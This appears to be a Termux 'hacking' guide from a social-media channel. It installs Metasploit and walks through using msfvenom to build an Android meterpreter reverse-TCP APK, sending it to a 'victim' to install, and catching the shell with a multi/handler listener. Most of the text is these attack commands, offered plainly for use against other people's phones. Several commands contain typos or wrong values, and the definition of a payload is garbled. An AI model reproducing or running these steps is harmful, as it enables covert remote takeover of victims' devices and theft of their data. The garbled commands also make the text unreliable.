━━━━━━━━━━━━━━━━━━━━━━━━━━
About Tool:
↦ Metasploit installation and usage guide.
━━━━━━━━━━━━━━━━━━━━━━━━━━
Available For:
↦ TERMUX
━━━━━━━━━━━━━━━━━━━━━━━━━━
Requirements:
↦ 600 MB data
↦ 800 MB storage
↦ No root
↦ Data Connection
━━━━━━━━━━━━━━━━━━━━━━━━━━
Installation & Usage:
What is payload ?
A payload is a malware function of Trojan horse which transmit data from victim to attacker these type of malwares is called payload.
$ apt-get update
$ apt-get updgrade
$ pkg install unstable-repo OR apt install unstable-repo
$ pkg install metasploit OR apt install metasploit
After installation
$ ./msfconsole
Wait 2min until open
$ ./msfvenom -p android/meterpreter/reverse_tcp LHOST=(your IP) LPORT=4444 R > /sdcard /shell.apk
Want IP go to google search what is my IPv4 address 1st link open copy your ip
Payload is on internal storage send payload to victim install it on victim mobile
$ pkg install postgresql
$ pg_ctl -D $PREFIX/var/lib/postgresql start
$ msfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPORT=ip R > /sdcard/name.apk
$ ./msfconsole
$ use exploit/multi/handler
$ set payload android/meterpreter/reverse_tcp
$ set LHOST (ip)
$ set LPORT (port number)
$ exploit
━━━━━━━━━━━━━━━━━━━━━━━━━━
↦
✇ ━━━━━ MORE STUFF ━━━━━━━ ✇
WEBSITE:
https://yaaronkayaar.wordpress.comFOLLOW US:
Instagram
@yaaron_ka_yaar2Twitter: yaaro_ka_yaar2
Fb: yaaron_ka_yaar2
Gmail: yaaron_ka_yaar2
Ph.no:774****806
Full ph no ke liye rendom try kro😶😶
Copy from noob pro hacker